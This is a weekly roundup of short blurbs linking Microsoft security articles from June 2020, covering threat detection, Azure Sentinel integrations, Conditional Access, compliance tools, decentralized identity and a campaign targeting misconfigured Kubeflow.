Microsoft Security Saturday – 6/13/2020

Blue teams helping red teams: A tale of a process crash, PowerShell, and the MITRE ATT&CK evaluationMicrosoft Threat Protection automatically detected the execution of the reflective loader via PowerShell; however, during the execution of this attack, the telemetry provided by the product also captured the launch of WerFault.exe process (the Windows Error Reporting process) forked from PowerShell.exe, which was a sign of a crashing process.

Deliver a Security Score weekly briefingBy leveraging a Microsoft Logic App Get-SecureScoreData you can export the Security Score and control details as daily snapshots into Log Analytics Workspace. With the historical data being kept we can build dashboards, search through and do advanced triggering on multiple recommendations, and even build end of month forecasted scores using time series insights. 

Top 4 tips to protect your remote workforce with data compliance in OneDriveRead on to learn how Microsoft 365 and OneDrive helps keep your data secure and private at the same time reducing the stress on IT during compliance or litigation issues.

Azure AD Mailbag: Frequent questions about using device-based Conditional Access for remote workLately, we’re seeing more customers implementing device-based Conditional Access a way of configuring Conditional Access policy) and Hybrid Azure AD Join to enable secure remote work. Our Azure AD Devices team would like to share best practices and tips that we’ve assembled while working closely with customers.

Announcing general availability of Microsoft Information Protection in Power BIToday we are excited to announce the general availability of Microsoft Information Protection’s sensitivity labels in Power BI. The same sensitivity labels you use to classify and label data in Microsoft365 apps (e.g. Excel) can now be used to classify and label sensitive data in the Power BI service too.

The science behind Microsoft Threat Protection: Attack modeling for finding and stopping evasive ransomwareTo provide security teams with the visibility and solutions to fight cyberattacks, Microsoft Threat Protection (MTP) correlates threat signals across multiple domains and point solutions, including endpoints, identities, data, and applications. This comprehensive visibility allows MTP to coordinate prevention, detection, and response across your Microsoft 365 data.

Web shell threat hunting with Azure Sentinel and Microsoft Threat ProtectionIn this blog we use Azure Sentinel to enrich the investigation of endpoint web shell alerts from Microsoft Defender Advanced Threat Protection (MDATP) by correlating with additional data sources, such as W3CIIS log. 

11 security tips to help stay safe in the COVID-19 eraAs we spend more time online, it’s important to remember that the basics of online safety have not changed. These guidelines provide a strong foundation for digital security, but as we think about the “new normal” and how the internet is woven into the fabric of our lives, extra steps may be necessary to further reduce risk.

Getting started with Insider Risk ManagementInsider risk management is a solution in Microsoft 365 that helps minimize internal risks by enabling you to detect, investigate, and take action on risky activities in your organization. Custom policies allow you to detect and take action on malicious and inadvertent risk activities in your organization, including escalating cases to Microsoft Advanced eDiscovery if needed.

Records Management WebinarRecords management in Microsoft 365 helps an organization manage their legal obligations, provides the ability to demonstrate compliance with regulations, and increases efficiency with regular disposition of items that are no longer required to be retained, no longer of value, or no longer required for business purposes.

Building trust into digital experiences with decentralized identities (DID)Today, I’d like to highlight some really significant progress in two important open standards efforts: Verifiable Credentials and Decentralized Identifiers. We view these two standards as being key foundational elements in our efforts to enable privacy preserving, trustworthy identity for everyone.

Give your HR and IT teams more reasons to cheer with improved integration between Workday & Azure ADRecently, we announced a strategic partnership with Workday that will bring more integrations for our joint customers. Today, we’d like to highlight three enhancements we’ve recently made in the Azure AD Workday integration.

“Why are my users not prompted for MFA as expected?”We’re going beyond MFA, too, where the idea is to not even require a password anymore – use other technologies to make sign-ins easier AND more secure – at the same time.  For example, below, our ‘passwordless sign-in’ capability sends a prompt to the PC with a number, then moments later, the MS Authenticator app on a mobile device prompts for a number-match, followed by a biometric.

Give your HR and IT teams more reasons to cheer with improved integration between Workday & Azure ADRecently, we announced a strategic partnership with Workday that will bring more integrations for our joint customers. Today, we’d like to highlight three enhancements we’ve recently made in the Azure AD Workday integration.

Azure Sentinel Agent: Collecting from servers and workstations, on-prem and in the cloudTo collect events from servers wherever those are deployed, use the Azure Log Analytics agent (also called “MMA” for Microsoft Monitoring Agent). The agentsupports collecting from Windows machines as well as Linux. 

Azure Security Center Auto-connect to SentinelIn this blog post I will introduce a way to automate inclusion of new Azure Security Center subscriptions into Azure Sentinel, more specifically, any new subscriptions in the organization will stream Azure Security Center alerts to Sentinel.

How to respond to potential Malware uploaded to Azure Storage BlobAzure Security Center covers a wide capability on Cloud Workload Platform Protection (CWPP) when it comes protecting Platform as a Service. One of those capabilities is alerting to potential malware uploaded as a Blob to an Azure Storage Account.

MIP and Compliance V-blog #2: Setting up a secure collaboration environment – End user point of viewLast week we showed you how to set up a secure collaboration environment to ensure that communications within and external to your environment are secured.   This week, we change course and look at this environment from the end users point of view.   Two users on the acquisitions team for project BASOS need to work with each other, and also collaborate with the CEO of the “to be acquired” company. 

Sending alerts enriched with supporting events from Azure Sentinel to 3rd party SIEMsIn the blog post we will introduce a solution which uses Logic Apps to automatically attach evidence to Azure Sentinel alerts and send them to an Event Hub that can be consumed by a 3rd party SIEM solution.

Protecting your GitHub assets with Azure SentinelThere are multiple features to help you secure your GitHub organization, but in this blog we will introduce a solution which uses Logic Apps to pull GitHub audit logs & ingest them into Sentinel.

Misconfigured Kubeflow workloads are a security riskAzure Security Center monitors and defends thousands of Kubernetes clusters running on top of Azure Kubernetes Service. In this blog, we’ll reveal a new campaign that was observed recently by ASC that targets Kubeflow, a machine learning toolkit for Kubernetes.

Barracuda and Microsoft: Removing security barriers to faster public cloud adoptionTo quickly and successfully move to public cloud, organizations need to deploy advanced network security solutions that are tightly integrated with the major public cloud platforms.